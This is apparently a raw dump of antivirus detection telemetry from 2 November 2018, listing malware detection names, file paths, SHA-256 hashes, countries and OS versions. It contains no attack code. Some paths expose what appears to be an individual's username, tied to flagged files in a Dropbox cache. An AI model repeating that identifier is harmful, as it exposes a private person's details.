  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='launcher.dll', filepath='C:\\Program Files\\Counter-Strike Global Offensive\\bin\\launcher.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='08e6099e78d1848a4f52d30426dfde4b17042aee209e4c87ec2ff0a284526fc1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T16:35:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='26c4acfcd7541ae62fb29525bd05b49ee443af0e849669e32fe42f55f2e4f4c1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\26C4ACFCD7541AE62FB29525BD05B49EE443AF0E849669E32FE42F55F2E4F4C1', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='26c4acfcd7541ae62fb29525bd05b49ee443af0e849669e32fe42f55f2e4f4c1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:42:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup (1).zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup (1).zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:40:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194151-4c031b78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194151-4C031B78', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:41:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:03:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T17:39:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup-ACER3g\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:53:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winrar-x64-400sc.exe', filepath='F:\\xerox700-pc备份\\win7软件\\winrar-x64-400sc.exe', filesize=128000, name='W32/Stanit.#M1.#R1'), hash='11a8755e357bf42ade043adf4c2000cff979609523b666cf9e557b75df2cb785', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T03:10:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-010743-52b88fb5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb24b2b1\\AVSCAN-20181102-010721-4F94E60B\\AVSCAN-20181102-010743-52B88FB5', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:07:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6a315014efeb7a5b1077522aab9b488ce719ecad7ac8ed576552a0e4778d3e9c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6A315014EFEB7A5B1077522AAB9B488CE719ECAD7AC8ED576552A0E4778D3E9C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6a315014efeb7a5b1077522aab9b488ce719ecad7ac8ed576552a0e4778d3e9c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:58:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unwise.exe', filepath='C:\\Program Files\\Yahoo!\\Messenger\\UNWISE.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='732a32981540f2e22fb53ee75cc106761595feefddb07e3f41126a834a8d065d', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-112409-64892094', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a7e195c0\\AVSCAN-20181102-112339-60CAB9A8\\AVSCAN-20181102-112409-64892094', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:24:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T02:06:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.vir', filepath='C:\\Users\\X\\AppData\\Local\\Canon Network Tool\\msIExEc64.VIR', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='-r', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Free 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T08:55:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052150-2bf5ca22', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052150-2BF5CA22', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051516-40ee92dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051516-40EE92DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.772\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.772\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:51:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='d3dx9.dll', filepath='C:\\Users\\X\\Desktop\\Vape Cracked 2.47\\1.7.10\\d3dx9.dll', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline='x -iext -ow -ver -- \\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Vape Client 2.47.rar\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1569736, timestamp='2018-11-02T20:11:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX44.824\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX44.824\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T07:19:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053927-a1cd0c05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053927-A1CD0C05', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052244-4c61b85b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052244-4C61B85B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152926-977f67c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-152926-977F67C1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:32:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa2276.47987\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa2276.47987\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T05:11:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001f09', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001f09', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:50:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055254-82d2e22d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055254-82D2E22D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051545-5261bb51', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051545-5261BB51', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061405-78a228f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061405-78A228F7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061247-4a5995bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061247-4A5995BB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135154-581d2199', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-135154-581D2199', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:55:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125106-9250a4fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c7d6212d\\AVSCAN-20181102-125045-8E9F70B3\\AVSCAN-20181102-125106-9250A4FB', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:51:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000763c', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp0000763c', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:52:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-142639-db6fe3d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-142639-DB6FE3D6', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051316-f995a1fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051316-F995A1FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055511-d4df6d8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055511-D4DF6D8C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051813-aaee7430', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051813-AAEE7430', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052446-94f54cd7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052446-94F54CD7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055133-52952ee2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055133-52952EE2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061952-47c6d8b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061952-47C6D8B0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055503-d00ed76b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055503-D00ED76B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055101-3f79b2d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055101-3F79B2D3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051027-94dd6b6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051027-94DD6B6D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055538-e51eed7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055538-E51EED7F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:37Z'), dt=datetime.date(2018, 11, 2)),
